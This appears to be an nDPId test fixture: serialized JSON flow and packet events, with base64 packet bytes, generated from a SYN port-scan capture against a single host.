-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1114,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1105,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsMa8AAC0G6cOsEAAIQA2GNIzSAZbdUoMYAAAAAGACCAAu+QAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1115,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22939,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1106,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAs1jgAADkGOTqsEAAIQA2GNIzSWZvdUoMYAAAAAGACCADW8wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1116,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1116,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1107,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsX6EAACgGwNGsEAAIQA2GNIzTCo7dU4MZAAAAAGACBAAp\/gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1117,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1117,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1108,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsYDUAADoGrj2sEAAIQA2GNIzTE6bdU4MZAAAAAGACDAAY5gAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1118,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1118,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1109,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAs6TwAADIGLTasEAAIQA2GNIzThw3dU4MZAAAAAGACDAClfgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1119,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1110,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsEGcAACwGDAysEAAIQA2GNIzTBEvdU4MZAAAAAGACBAAwQQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1120,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1111,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAs0FQAACUGUx6sEAAIQA2GNIzTJXrdU4MZAAAAAGACCAALEgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1121,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1121,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1112,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsMh0AADEG5VWsEAAIQA2GNIzTH5fdU4MZAAAAAGACCAAQ9QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1122,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1122,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1113,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsi4MAADAGjO+sEAAIQA2GNIzTG8LdU4MZAAAAAGACBAAYygAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1123,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1123,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1114,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsv9UAADsGTZ2sEAAIQA2GNIzTIqndU4MZAAAAAGACEAAF4wAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1124,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":89,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1124,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1115,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAskOIAAC4GiZCsEAAIQA2GNIzTAFndU4MZAAAAAGACDAAsMwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1125,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1125,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1116,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsGKMAACkGBtCsEAAIQA2GNIzTDfzdU4MZAAAAAGACCAAikAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1126,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2399,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1126,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1117,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsJZ0AAC4G9NWsEAAIQA2GNIzTCV\/dU4MZAAAAAGACDAAjLQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1118,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsJmMAADcG6w+sEAAIQA2GNIzTIyLdU4MZAAAAAGACEAAFagAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1119,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsp1gAADQGbRqsEAAIQA2GNIzTAyDdU4MZAAAAAGACBAAxbAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1129,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1129,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1120,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsNHwAAC4G5fasEAAIQA2GNIzTF9XdU4MZAAAAAGACDAAUtwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1130,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2170,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1121,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsqy4AADYGZ0SsEAAIQA2GNIzTCHrdU4MZAAAAAGACDAAkEgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1131,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1122,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAssb8AACcGb7OsEAAIQA2GNIzTBFjdU4MZAAAAAGACEAAkNAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1132,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsbzUAADkGoD2sEAAIQA2GNIzTAJDdU4MZAAAAAGACCAAv\/AAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1133,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1133,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1124,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsBpUAAC4GE96sEAAIQA2GNIzTDUzdU4MZAAAAAGACDAAfQAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1134,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1533,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1134,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1125,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsewcAADYGl2usEAAIQA2GNIzTBf3dU4MZAAAAAGACDAAmjwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1135,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1117,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1135,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1126,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsb+sAACUGs4esEAAIQA2GNIzTBF3dU4MZAAAAAGACCAAsLwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1136,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1127,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAseUEAADgGlzGsEAAIQA2GNIzTA\/PdU4MZAAAAAGACBAAwmQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1137,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3325,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1128,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAs8aMAAC0GKc+sEAAIQA2GNIzTDP3dU4MZAAAAAGACCAAjjwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1138,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 